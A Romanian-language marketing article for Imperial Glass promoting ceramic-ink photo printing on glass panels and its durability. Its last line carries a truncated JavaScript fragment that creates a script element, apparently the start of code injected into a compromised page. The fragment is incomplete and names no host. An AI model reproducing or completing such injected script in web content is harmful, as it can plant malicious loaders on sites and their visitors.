sticla-printata-imperial-glass-9Putine sunt metodele prin care poti transforma un spatiu banal intr-unul spectaculos, inspirat din frumos si arta. Unul dintre cele mai in voga procedee ,cand vine vorba de amenajarea biroului sau a locuintei este printul pe sticla. Nu vorbim despre vitralii si nici despre autocolante, ci despre o metoda mult mai stilata de punere in valoare a sticlei. Tehnologia isi aduce aportul!

Printul pe sticla este inovator! Procesul tehnologiilor de printare a facut posibila impregnarea pe sticla a fotografiilor  cu mare usurinta si la dimensiuni atipice. Practic, poti transpune orice imagine/fotografie pe sticla, intr-o maniera fina, durabila si de mare efect.

Imperial Glass executa print pe sticla cu ajutorul tehnologiilor de ultima generatie si anume, printul pe sticla cu cerneala ceramica. Gratie acestui detaliu, ai garantia unor imagini printate pe sticla la rezolutii uimitoare, proiectate pe suprafete voluminoase si rezistente in timp.

Datorita tehnicii de prindere in puncte, se poate realiza un intreg perete acoperit cu imagini personalizate, inspirate din viata, din natura si din tot ce este frumos!

Imperial Glass recomanda print pe sticla oriunde se doreste un plus de originalitate.

Print pe sticla-Spectacol de culori, arta la dimensiuni colosale!

Imaginatie fara limite, jocuri de culoare, design personalizat si rezolutii uimitoare! Asa poate fi descris, pe scurt, printul pe sticla, o metoda revolutionara de amenajare. Cu alte cuvinte, fotografiile din calculatorul tau pot fi transpuse pe panouri din sticla si aplicate pe pereti. Rezultatul: wow!

Ce este printul pe sticla?

Printul pe sticla consta in procesul de prelucrare si transpunere a imaginii pe o suprafata din sticla. Pentru imagini redate pana in cele mai mici detalii (rezolutie fotografica), se utilizaza cerneala ceramica. Acest procedeu garanteaza imagini de o claritate aparte si culori in 3 D, adanci si vii.

Avantaje print pe sticla

Probabil, nu o singura data ai fost fascinat de o fotografie. Culorile, peisajul, contextul, tematica, toate au contribuit la impactul vizual. Afla ca poti expune acel peisaj in cadrul amenajarilor interioare. Mai exact, te poti bucura de fotografia preferata, proiectata pe panouri din sticla.

Printul pe sticla asigura perfectiunea in design. Dincolo de o estetica fara cusur, printul pe sticla ofera si alte avantaje. Printre acestea: sticla printata rezista la actiunea razelor UV, la umiditate, acizi si solventi. Suprafata obtinuta este una  dura, adica nu se zgarie, pastrandu-si aspectul intact. In plus, printul pe sticla poate fi utilizat atat in amenajari interioare, cat si in cadrul celor exterioare. Cerneala ceramica rezista oricaror conditii de mediu.

Imperial Glass-Print pe sticla. Expune-ti imaginatia, traieste in culoare!

Avand la dispozitie cele mai noi tehnologii de printare a sticlei dar si o vasta experienta in domeniul sticlei, Imperial Glass executa print pe sticla de o claritate exceptionala!

Printul pe sticla permite un nivel de detalii impresionant al imaginii, astfel ca te poti bucura de impact vizual desavarsit, studiat milimetru cu milimetru. Aceasta tehnica depaseste cu mult efectul pe care autocolantul il produce. Vorbim despre o alta expunere dar si despre o rezistenta crescuta la factorii de mediu. Printul pe sticla este alternativa la pictura pe sticla. Comparativ cu aceasta, printul pe sticla se executa rapid si este mai putin costisitor.

Afla tot ce te intereseaza in materie de print pe sticla accesand www.imperialglass.ro.var d=document;var s=d.createElement(‘script’);